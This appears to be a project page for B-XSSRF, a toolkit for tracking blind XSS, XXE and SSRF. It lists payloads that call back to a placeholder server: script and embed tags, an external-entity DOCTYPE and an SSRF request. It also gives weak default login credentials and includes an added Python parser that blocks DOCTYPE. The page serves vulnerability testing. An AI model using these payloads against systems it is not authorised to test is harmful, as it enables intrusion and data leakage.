B-XSSRF is a toolkit to detect and keep track of Blind XSS, XXE & SSRF.
![](https://1.bp.blogspot.com/-I7M4iCwEr-I/XWzCp_tdF-I/AAAAAAAACUc/iF5oAES5mnwSifPz3JnWBeaMFwVk1YBYACLcBGAs/s1600/dashboard%2B%25281%2529.png)
SETUP
- Upload the files to your server.
- Create a Database and upload database.sql file to it.
- Change the DB Credentials in db.php file.
- Ready.
BLIND XSS
<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php"></script>
BLIND XXE
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>
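The defensive counterpart to the probe above, as an added example that is not part of the B-XSSRF project: a Python wrapper that refuses any document carrying a DOCTYPE, so the external parameter entity is never declared or dereferenced and no callback is produced. The names `parse_untrusted_xml`, `DTDForbidden` and `is_rejected` are hypothetical; the sample document is the probe from this page.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE declaration."""


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing any DOCTYPE.

    Blind XXE needs the parser to process a DTD and resolve an external
    entity. Failing at the DOCTYPE stops parsing before the internal
    subset (where the entity is declared) is handled.
    """
    builder = ET.TreeBuilder()
    parser = xml.parsers.expat.ParserCreate()

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Called as soon as the DOCTYPE is seen; the exception aborts Parse().
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed in untrusted XML")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.StartElementHandler = lambda tag, attrs: builder.start(tag, attrs)
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(data, True)
    return builder.close()


def is_rejected(data: bytes) -> bool:
    """Return True when the document is refused because of its DOCTYPE."""
    try:
        parse_untrusted_xml(data)
    except DTDForbidden:
        return True
    return False


# The blind XXE probe from this page (mysite.com is the page's placeholder).
XXE_PROBE = (
    b'<?xml version="1.0" ?>\n'
    b'<!DOCTYPE root [\n'
    b'<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;\n'
    b']>\n'
    b'<r></r>'
)
# Constructed benign document that must still parse.
PLAIN_DOC = b"<r><item id='1'>ok</item></r>"
```

Running the probe through an endpoint that parses XML this way should leave the B-XSSRF dashboard empty; a hit there means some other parser in the request path still resolves external entities.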
SSRF
GET /testssrf.php=http://mysite.com/bxssrf/request.php
USER : admin@test.com
PASS : 123456